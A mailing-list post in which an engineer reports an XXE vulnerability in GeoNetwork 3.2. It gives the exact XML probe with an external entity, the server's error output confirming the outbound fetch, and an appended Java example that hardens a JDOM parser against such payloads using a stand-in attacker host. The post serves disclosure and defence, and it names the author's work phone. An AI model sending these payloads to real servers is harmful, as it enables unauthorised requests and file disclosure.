[GeoNetwork-usuarios-es] Geonetwork XXE Vulnerability question

Hi,

My name is Mariano Valderrey, and I have scanned my GeoNetwork with Acunetix and found an XML External Entity Injection vulnerability. I found that in GeoServer you have fixed the problem and maybe I can use the solution for GeoNetwork 3.2.
I wonder if you can help me with this.

Here is what I found:

https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing

**************

To confirm this I sent a specific request with this XML to the URL /geonetwork/srv/eng/catalog.search

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE request [
   <!ENTITY include SYSTEM "http://google.com">
]>
<catalog.search>&include;</catalog.search>

And I received this result:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>Error 400 Cannot build ServiceRequest
Cause : Error on line 1 of document
http://www.google.com.ar/?gfe_rd=cr&amp;ei=_x9cWI-FMsWB8QfG05vIDA: The
content of elements must consist of well-formed character data or markup.
Error : org.jdom.input.JDOMParseException
</title>
</head>
<body><h2>HTTP ERROR 400</h2>
<p>Problem accessing /geonetwork/srv/eng/catalog.search. Reason:
<pre> Cannot build ServiceRequest
Cause : Error on line 1 of document
http://www.google.com.ar/?gfe_rd=cr&amp;ei=_x9cWI-FMsWB8QfG05vIDA: The
content of elements must consist of well-formed character data or markup.
Error : org.jdom.input.JDOMParseException
</pre></p><hr><a href="http://eclipse.org/jetty">Powered by Jetty://
9.3.11.v20160721</a><hr/>

</body>
</html>

******************

In the packet capture from the server I can see that it sends a request to http://google.com, and I found in the result that the server was redirected to www.google.com.ar. This confirms the vulnerability.

Sorry for my English,

Greetings and thank you so much.

--
Mariano Valderrey, Systems Engineer
Tel. (+54 11) 4331 0074 ext. 5727
Database and Communications Unit
Technology Management Division
CONAE
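The error page names org.jdom.input.JDOMParseException, so the request body is evidently parsed with JDOM. The following is an added example (not GeoNetwork's code, nor the GeoServer fix mentioned above) of how a JDOM SAXBuilder can be hardened so that a payload shaped like the one in the post is rejected before any external entity is fetched; the class name, the helper methods and the placeholder host attacker.example are assumptions for the illustration.

```java
import java.io.IOException;
import java.io.StringReader;
import org.jdom.Document;
import org.jdom.JDOMException;
import org.jdom.input.SAXBuilder;

public class SafeXmlRequest {
    // Constructed sample with the same shape as the payload in the post,
    // but the external entity points at a placeholder host, not a real URL.
    static final String PAYLOAD =
        "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n"
      + "<!DOCTYPE request [\n"
      + "   <!ENTITY include SYSTEM \"http://attacker.example/\">\n"
      + "]>\n"
      + "<catalog.search>&include;</catalog.search>";

    /** Hardened builder: a DOCTYPE is a fatal error, so no general or
     *  parameter entity can be declared, and entities are never expanded. */
    static SAXBuilder hardenedBuilder() {
        SAXBuilder builder = new SAXBuilder();
        // Xerces feature: any <!DOCTYPE ...> aborts the parse immediately.
        builder.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defense in depth for parsers that still tolerate a DOCTYPE.
        builder.setFeature("http://xml.org/sax/features/external-general-entities", false);
        builder.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        builder.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        builder.setExpandEntities(false);
        return builder;
    }

    /** Returns true when the document was rejected, false when it parsed. */
    static boolean rejects(String xml) {
        try {
            Document doc = hardenedBuilder().build(new StringReader(xml));
            return doc == null; // parsed cleanly: a normal request body
        } catch (JDOMException e) {
            // Expected for PAYLOAD: "DOCTYPE is disallowed when the feature
            // ... disallow-doctype-decl set to true"; nothing was fetched.
            return true;
        } catch (IOException e) {
            return true;
        }
    }

    public static void main(String[] args) {
        System.out.println("hostile payload rejected: " + rejects(PAYLOAD));
        System.out.println("plain request accepted:  " + !rejects("<catalog.search/>"));
    }
}
```

With the DOCTYPE rejected up front, the server never opens the outbound connection that the packet capture in the post revealed, which is the observable difference a re-scan should show.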